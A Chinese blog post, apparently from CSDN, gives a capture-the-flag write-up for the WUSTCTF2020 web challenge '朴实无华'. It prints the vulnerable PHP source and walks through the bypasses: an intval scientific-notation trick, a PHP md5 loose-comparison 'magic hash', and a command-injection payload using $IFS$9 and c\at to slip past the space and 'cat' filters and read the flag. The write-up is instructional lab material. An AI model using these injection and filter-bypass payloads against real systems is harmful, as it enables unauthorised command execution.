[WUSTCTF2020]朴实无华

最新推荐文章于 2021-12-07 22:23:42 发布
最新推荐文章于 2021-12-07 22:23:42 发布
阅读量93 收藏
点赞数 1
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113407720
版权

[WUSTCTF2020]朴实无华

在这里插入图片描述
据wp所说,看到bot就想到了robots.txt
反正我是没注意到bot,也没想到robots.txt
太菜了!
在这里插入图片描述
访问
在这里插入图片描述
看了wp说响应头里有提示,我还是没想到,还是太菜!在这里插入图片描述

?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

绕过两个if,然后在第三个if里面getflag

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

关键是要绕过这句

intval($num) < 2020 && intval($num + 1) > 2021

intval()函数在处理字符串型的科学计数法时,只输出e前面的数字

intval('2e4') = 2
'2e4'+1 = float(20001)
intval('2e4'+1) = 20001

好家伙那么解法就很清晰了

$num=2e4

在这里插入图片描述

//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

md5=md5编码后的md5
也就是0e开头的字符串编码之后还是0e开头
我搜了一个但是不行,还是用wp里面的吧0e215962017

?num=2e4&md5=0e215962017

在这里插入图片描述

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

好像挺简单,反斜杠过滤

?num=2e4&md5=0e215962017&get_flag=ls

在这里插入图片描述
$IFS$9代替空格

?num=2e4&md5=0e215962017&get_flag=c\at$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

在这里插入图片描述

切谁怕谁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF re个人wp1-8
weixin_47234647的博客
10-12 190
做了一堆re才返回来写wp的懒狗 怕自己忘了 也给萌新们介绍介绍 虽然我学re才一个多月啊摔(′д` ) 必备工具: ida 逆向必备 不多说 jadx 安卓反编译 直接看逻辑 很好用 Androidkiller 安卓逆向 也可 但是没有反编译 PEiD:查壳 分析文件的 kali:一个系统 装虚拟机里面吧 里面好多工具也很好用 包括但不限于以上工具 前置知识: C语言基础 常见库函数你得懂吧 百度bing Google github等网站的搜索学习能力 各种常见算法 如异或 base系列 基本的排序啥
WUST-CTF web-朴实无华 wp
qq_42188168的博客
03-30 504
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 &am...
[WUSTCTF2020]朴实无华wp_弱类型、intval函数使用不当
sGanYu
11-03 2800
知识点: intval函数绕过,php弱类型,空格绕过cat绕过 题目一打开显示Hack me 利用御剑扫出了robots.txt文件 进入robots.txt提示 进入/fAke_f1agggg.php,结果给出了一个假的flag 在响应头内找到关键信息,/fl4g.php 访问之后获得源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highligh
Writeup.rar
12-01
Writeup.rar
BUUCTF-MRCTF2020
Atkx's Blog
08-08 5596
目录标题Ezpop套娃 Ezpop 套娃 查看源码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t']))
2020-纵横杯-Writeup.pdf
03-15
2020年纵横杯CTF比赛Writeup 高清PDF版
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
note:就是一个朴实无华的笔记本
04-02
这个名为"note:就是一个朴实无华的笔记本"的压缩包文件,可能是某个开发者或学习者整理的关于特定主题——对数序列的学习资料。对数序列在数学和计算机科学中有着重要的应用,尤其是在算法分析和复杂度计算中。 ...
logseq:就是一个朴实无华的笔记本
03-29
《logseq:构建个人知识库的实用工具》 在当今信息爆炸的时代,管理和组织个人知识变得至关重要。logseq,正如其名,是一个简洁而强大的笔记本应用,专为那些寻求高效知识管理的人士设计。它以其独特的功能和灵活性...
zapp:朴实无华的用作快速建造项目的基础库
03-19
为快速建造项目的基础库 开始 app := zapp . NewApp ( "test" ) app ....扩展性 组件 我们实现了一些组件,可以在找到 服务 我们实现了一些服务,可以在找到 ...作为一个基础库,我们尽量减少了依赖包,只需要以下包依赖 ...
一个朴实无华的Java计算引擎(很实用) 【文件备份一下,以免丢失】
最新发布
11-16
Java计算引擎是一种用于执行计算任务的软件框架,它利用Java编程语言的强大功能和跨平台兼容性,为开发者提供了一个高效且灵活的环境来处理各种计算问题。在这个项目中,我们看到的是一个相对简单的实现,专注于实用...
[CTF]UNCTF2021 WP
Sapphire037的博客
12-07 1540
WEB fuzz_md5 爆破找前6位为666666的md5的值,然后常规操作即可得到flag import hashlib import re for a in range(1,1000000000): b=hashlib.md5(str(a).encode("utf-8")) c=(b.hexdigest().encode("utf-8")) if c[0:6]==b'666666': print(a) #print(c) babywrite <?php highlight_fil
CTF中一些绕过
qq_41996851的博客
04-23 2435
PHP 主要体现在序列化中; php中的类会有构造函数和析构函数,也还有内置的一些其他语言没有的函数: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; // 构造函数,声明对象时触发 public function __construct($username,$password){
2020三叶草 二进制二面wp
qq_51868336的博客
11-23 309
“红明谷“ 初赛 web 部分WP
feng的博客
04-03 1397
前言 参加了第一届红明谷的比赛,4道web当时只做出2道,第三道苦于那个数据库的密码不知道,赛后才问了别的师傅才知道是123456这个弱密码。。。草了。 因为实在太懒了。。。本来不想专门写这篇WP的,因为当时做题的时候只潦草的记下了当时的wp,用的姿势可能还不是最简便的方式。但是想想,不写的话总感觉缺了点什么,所以就把我当时潦草的wp记录给复制粘贴过来了(笑),见谅见谅。 happysql ban了单引号,但是查询的语句中用的是双引号,拿双引号闭合,如果登录成功的会302跳转到home.php,因此可以布尔
UNCTF2021 部分WP
weixin_46356548的博客
12-07 2309
Cola UNCTF2021 Writeup Web fuzz_md5 审计源码,需传入user、pass,user需要=“unctf”,pass的md5前5位需要=“66666”。 user使用preg_replace,替换unctf为空,但仅替换一次,可使用ununctfctf双写绕过。 $a=preg_replace("/unctf/i","",$user); md5使用脚本爆破 import hashlib md5 = "66666" for asc1 in range(48,123):
✿2021NEWCTF6.1萌新赛✿MISC-all-WP
Tokeii想躺平
06-02 2782
2021萌新赛MISCWP,加一道CryptoMISC-sign inMISC-very-ez-dumpMISC-!了反都,了反MISC-happy六一MISC-PeltateMISC-base64 ... or base56?MISC-????????????MISC-包 MISC-sign in 下载解压发现pdf需要密码打开 直接爆破,得到密码:661123 打开文件获得flag: flag{welec0me_to_news_ctf} MISC-very-ez-dump 下载文件,直接用foremo
CTF逆向总结(一)
热门推荐
沐一 · 林 的博客
10-17 1万+
目录 CTF 逆向总结 题目类型总结: 汇编操作类总结: ASCII码表类总结: 逆向、脚本类总结: 栈、参数、内存、寄存器类总结: 函数类总结: IDA等软件类总结: 算法类总结: main函数主逻辑分析(C语言) 不能正常运行的exe文件类型: bugku 逆向入门:(实际TxT文件、不能直接运行) 攻防世界的csaw2013reversing2:(运行乱码、int3断点考察、函数积累、不能直接运行) 攻防世界parallel-comparator-200:(.c文件、.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值